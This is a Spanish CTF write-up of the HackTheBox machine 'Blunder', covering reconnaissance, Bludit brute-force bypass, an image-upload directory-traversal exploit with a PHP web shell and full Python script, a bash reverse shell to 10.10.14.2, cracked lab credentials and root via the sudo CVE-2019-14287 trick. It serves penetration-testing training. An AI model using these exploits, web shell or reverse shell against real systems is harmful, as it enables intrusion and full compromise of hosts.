> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/writeups-ctf/hackthebox/linux-easy/blunder-hackthebox-writeup.md).

# Resolución de HackTheBox Blunder

{% embed url="<https://app.hackthebox.com/machines/Blunder>" %}

{% hint style="warning" %}
**Habilidades:**

* Explotación de Bludit CMS
* Evitar el bloqueo de IP (cabecera X-Forwarded-For)
* Carga de archivos de imágenes con Directory Traversal (jugando con .htaccess)
* Abuso del privilegio sudo (CVE-2019-14287)
  {% endhint %}

## Reconocimiento

**Configuración del espacio de trabajo:**

Configura el espacio de trabajo creando tres carpetas para almacenar contenido importante, exploits y resultados de reconocimiento de Nmap.

<figure><img src="/files/a0984a0fe498c9bdc6ed310df663517d0ddb1e2b" alt="" width="563"><figcaption></figcaption></figure>

**Comprobación de conectividad VPN**

Comprueba la conectividad VPN para asegurar una comunicación estable con la máquina objetivo.

<figure><img src="/files/74d49f34214c8e901c3e72ca9011dfc86b49c891" alt="" width="563"><figcaption></figcaption></figure>

**Descubrimiento de puertos abiertos con Nmap:**

Enumera los puertos abiertos y exporta los resultados al archivo "allPorts" en el directorio de Nmap:

```bash
nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.10.191 -oG allPorts
```

<figure><img src="/files/4ee4a9a0cd7a16a2354f7d732ba5b7a547e44d39" alt=""><figcaption></figcaption></figure>

**Análisis de puertos abiertos con extractPorts:**

Usa la función extractPorts para mostrar los puertos abiertos en un formato conciso y copiarlos al portapapeles (80)

<figure><img src="/files/a2802667503c7690f1561d0d2633a4ce36512528" alt="" width="563"><figcaption></figcaption></figure>

Escaneo de versiones de puertos con Nmap:

Usa Nmap para escanear las versiones de los servicios y guardar la salida en el archivo "targeted":

```bash
nmap -sCV -p80 10.10.10.191 -oN targeted
```

<figure><img src="/files/b5a75be137eb0567fa5b627c4c3e2d8fdf56f3a8" alt=""><figcaption></figcaption></figure>

Para resolver nombres de dominio en direcciones IP mediante DNS, insertamos el nombre de dominio asociado con su dirección IP en el `/etc/hosts` archivo:

<figure><img src="/files/ae1dca336e47ab95e2470bc43a10b324f8450cd0" alt=""><figcaption></figcaption></figure>

## Puerto 80 (Blunder):

<figure><img src="/files/bd3faa43612ae5af5b244f0c89ccaefdce1b3499" alt=""><figcaption></figcaption></figure>

**Escaneo de directorios**

Utilice **Gobuster** para encontrar directorios interesantes:

```bash
gobuster dir -u http://blunder.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
```

* Resultado: Descubrimiento de **/admin** directorio.

<figure><img src="/files/7dc62368c7a537b7ebe1f6fcda6d12b5b55401dc" alt=""><figcaption></figcaption></figure>

**Identificación del CMS**

Al acceder a **/admin**, se detecta el CMS Bludit (versión **3.9.2**).

<figure><img src="/files/081927058f056f9fb1d8dcf258d1afd4d88a79ae" alt="" width="360"><figcaption></figcaption></figure>

## **Explotación de Bludit CMS**

<figure><img src="/files/a0b40ebd79064f1fc9e989063f9e30d3203bfff0" alt=""><figcaption></figcaption></figure>

**Buscar vulnerabilidades**

Utilice `searchsploit` para encontrar vulnerabilidades conocidas:

<figure><img src="/files/e62524d2602439c16d9af216cfc43dcca3d60c3a" alt=""><figcaption></figcaption></figure>

#### Vulnerabilidad detectada: **CVE-2019-17240**

{% hint style="info" %}
El exploit tiene como objetivo aprovechar una vulnerabilidad en la mitigación de ataques de fuerza bruta en Bludit, una plataforma CMS (Content Management System). La vulnerabilidad, identificada como **CVE-2019-17240**, permite a un atacante eludir las protecciones contra ataques de fuerza bruta implementadas en las versiones de Bludit anteriores o iguales a 3.9.2.
{% endhint %}

`searchsploit -m php/webapps/48942.py`

**Archivo de texto encontrado**

Realiza una investigación adicional con Gobuster:

```bash
gobuster dir -u http://blunder.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x php,txt,html
```

<figure><img src="/files/872454f867902548311a7430b219948674710963" alt=""><figcaption></figcaption></figure>

Contenido: Usuario identificado: **fergus**.

<figure><img src="/files/0ee7ffe0e89d0c2535de313f9016aae2de2588f2" alt="" width="375"><figcaption></figcaption></figure>

### Fuerza bruta en Bludit

Una vez que el usuario **fergus** es descubierto, usa un diccionario para lanzar un ataque de fuerza bruta:

```bash
python3 exploit.py -l http://blunder.htb/admin/ -u user.txt -p password.txt
```

No se encontraron coincidencias para el archivo **rockyou.txt**.

### **Diccionario personalizado**

Utilice **Cewl** para generar un diccionario basado en el sitio web:

```bash
cewl -u http://blunder.htb/ -w password.txt
```

<figure><img src="/files/316b87703f18ace904b74670e352a85274a3029e" alt="" width="563"><figcaption></figcaption></figure>

Relanza el ataque de fuerza bruta con el diccionario personalizado:

<figure><img src="/files/aa39f44e53e3b6c4d2e673e5635035312076602c" alt=""><figcaption></figcaption></figure>

* Contraseña encontrada: `fergus:RolandDeschain`

<figure><img src="/files/1afc4c624e3b0b9a42e94a80b5407513cd984473" alt=""><figcaption></figcaption></figure>

## Explotación Carga de archivos de imágenes con Directory Traversal:

Una vez autenticado, este CMS es vulnerable a un ataque de tipo **Directory Traversal** que permite la carga de archivos maliciosos.

{% embed url="<https://github.com/bludit/bludit/issues/1081>" %}

{% hint style="info" %}
Podemos especificar la ubicación del archivo descargado cambiando el valor de `uuid` y luego subir una imagen maliciosa a la carpeta temporal.
{% endhint %}

Después de la autenticación, es posible descargar un nuevo exploit mediante `searchsploit` en `multiple/webapps/48701.txt`, que proporciona los pasos para explotar esta vulnerabilidad.

<figure><img src="/files/d7ee34eed3cd075fccc15c1013d4167a6512472c" alt=""><figcaption></figcaption></figure>

**Pasos para la operación**

<figure><img src="/files/72e0bc0aa1bac54ebee6a51abc301b6d687d0f5e" alt=""><figcaption></figcaption></figure>

1. **Crear un archivo malicioso** (`evil.png`) que contenga código PHP:

```bash
<?php
system($_GET['cmd']);
?>
```

2. **Modifica el script para adaptarlo a la situación** (dirección IP de la víctima, nombre de usuario, contraseña, etc.).

<figure><img src="/files/9b3f872620dead1d5c5cdca2fa9d4fefb5d559b1" alt="" width="563"><figcaption></figcaption></figure>

3. **Ejecutar exploit:**

Script Python de explotación:

```python
#!/usr/bin/env python3

import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

url = 'http://blunder.htb/admin'  # CAMBIARME
username = 'fergus'  # CAMBIARME
password = 'RolandDeschain'  # CAMBIARME

# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png'  # CREARME

#echo "RewriteEngine off" > .htaccess
#echo "AddType application/x-httpd-php .png" >> .htaccess
payload2 = '.htaccess'  # CREARME

def login(url,username,password):
    """ Inicia sesión con las credenciales de administrador proporcionadas y obtiene la cookie una vez autenticado """

    session = requests.Session()
    login_page = session.get(url + "/admin/")
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
                           login_page.text
                 ).group(1)
    cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
    data = {"save":"",
            "password":password,
            "tokenCSRF":csrf_token,
            "username":username}
    headers = {"Origin":url,
               "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests":"1",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer": url + "/admin/",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate",
               "Content-Type":"application/x-www-form-urlencoded"
    }
    cookies = {"BLUDIT-KEY":cookie}
    response = session.post(url + "/admin/",
                            data=data,
                            headers=headers,
                            cookies=cookies,
                            allow_redirects = False
               )

    print("cookie: " + cookie)
    return cookie

def get_csrf_token(url,cookie):
    """ Obtiene el token CSRF de una sesión autenticada """

    session = requests.Session()
    headers = {"Origin":url,
               "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests":"1",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer":url + "/admin/",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate"}
    cookies = {"BLUDIT-KEY":cookie}
    response = session.get(url + "/admin/dashboard",
                           headers=headers,
                           cookies=cookies
               )
    csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]

    print("csrf_token: " + csrf_token)
    return csrf_token

def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
    """ Sube los archivos necesarios para ejecutar PHP desde archivos de imagen maliciosos. Payload y .htaccess """

    session = requests.Session()
    files= {"images[]": (payload,
                         open(payload, "rb"),
                         "multipart/form-data",
                         {"Content-Type": "image/png", "filename":payload}
                        )}
    if override_uuid:
        data = {"uuid": "../../tmp/temp",
                "tokenCSRF":csrf_token}
    else:
        # En la aplicación vulnerable, esta línea ocurre primero:
        # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
        # Aunque haya una comprobación de la extensión del archivo, realmente no nos impedirá
        # subir el archivo .htaccess.
        data = {"tokenCSRF":csrf_token}
    headers = {"Origin":url,
               "Accept":"*/*",
               "X-Requested-With":"XMLHttpRequest",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer":url + "/admin/new-content",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate",
    }
    cookies = {"BLUDIT-KEY":cookie}
    response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
    print("Uploading payload: " + payload)

if __name__ == "__main__":
    cookie = login(url, username, password)
    token = get_csrf_token(url, cookie)
    upload_evil_image(url, cookie, token, payload, True)
    upload_evil_image(url, cookie, token, payload2)
```

<figure><img src="/files/6f31d1dc4a9bc5d0d35575746812af3d2e4233e6" alt="" width="563"><figcaption></figcaption></figure>

4. **Acceder al archivo malicioso**: Una vez que la imagen haya sido descargada, simplemente ve a `/bl-content/tmp/temp/evil.png` para ejecutar comandos.

<figure><img src="/files/0d99e365abde969fc6af1181022bbd6ab1023164" alt="" width="552"><figcaption></figcaption></figure>

5. **Escucha en el puerto 443 con Netcat**:

```bash
nc -nvlp 443
```

5. **Ejecuta una shell inversa**:

```bash
bash -c "bash -i >%26 /dev/tcp/10.10.14.2/443 0>%261"
```

<figure><img src="/files/58da192d3cd43d2565a6c123f407cfe9fa1e3e3c" alt="" width="563"><figcaption></figcaption></figure>

**Gestión de sesiones de terminal** :

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

## Escalada de privilegios

Explorar los archivos revela un archivo `users.php` en el `bases de datos` carpeta que contiene credenciales hasheadas para usuarios `fergus` y `admin`:

`admin:bfcc887f62e36ea019e3295aafb8a3885966e265`

`fergus:be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7`

<figure><img src="/files/cb4e51800e5ba2e40517320849bbb4bc222a3b4f" alt=""><figcaption></figcaption></figure>

Al usar CrackStation para intentar descifrar estos hashes, parece que no son reconocidos.

<figure><img src="/files/fcec7b74d5b6d6161ab42eab8bee96b8596c264c" alt=""><figcaption></figcaption></figure>

Sin embargo, en la raíz del sitio web, se encuentra una versión más reciente de Bludit, que contiene los mismos archivos de configuración, pero con credenciales diferentes:

<figure><img src="/files/99d7498bf3a20d1a95f880e85817eb8c90e775a6" alt="" width="497"><figcaption></figcaption></figure>

* **hugo** : `faca404fd5c0a31cf1897b823c695c85cffeb98d`

<figure><img src="/files/562ade445cc5e61da28768c51068ea3dbb48da62" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aa5c109eccae3595b892a8ca6c65b9bd56ef4a48" alt=""><figcaption></figcaption></figure>

`hugo:Password120`

<figure><img src="/files/5f902e20aa3ea6d85d7fd21926cc4d87bde3c54c" alt="" width="563"><figcaption></figcaption></figure>

### Flag user.txt:

<figure><img src="/files/ff1f528163d1848aa98e7ff2ab2d0d79ae898cbb" alt="" width="563"><figcaption></figcaption></figure>

### Abuso del privilegio sudo (CVE-2019-14287):

Al examinar los privilegios sudo, descubrimos una configuración vulnerable en el archivo sudoers. Usando el `sudo -l` comando, identificamos un privilegio que permite a todos los usuarios excepto `root` iniciar sesión con el `/bin/bash` comando:

<figure><img src="/files/ee6a6542e9ee43eb1ba393acb3eb1ad3fc952094" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

Esta vulnerabilidad afecta a todas las versiones de sudo anteriores a la 1.8.27.

En nuestro caso, la versión de sudo es inferior a 1.8.27, lo que hace que esta vulnerabilidad sea explotable.

<figure><img src="/files/f2483073a0f4faba1633ecb22da3d323e13a5324" alt="" width="510"><figcaption></figcaption></figure>

Para explotar esta vulnerabilidad, simplemente ejecuta el siguiente comando:

```bash
sudo -u#-1 /bin/bash
```

Este comando te permite ejecutar una shell como el usuario `-1`, que corresponde al usuario `root`.

<figure><img src="/files/4f4ef1e2338167ac4ce76014c125529ceadcc79c" alt="" width="563"><figcaption></figcaption></figure>

### Bandera root.txt :)

<figure><img src="/files/e57d9d4936805ed60929871d6b6920f45a9cc7de" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/c97c1e0ae7d1630fd7b14b206136c6ed7769350b" alt="" width="532"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/writeups-ctf/hackthebox/linux-easy/blunder-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
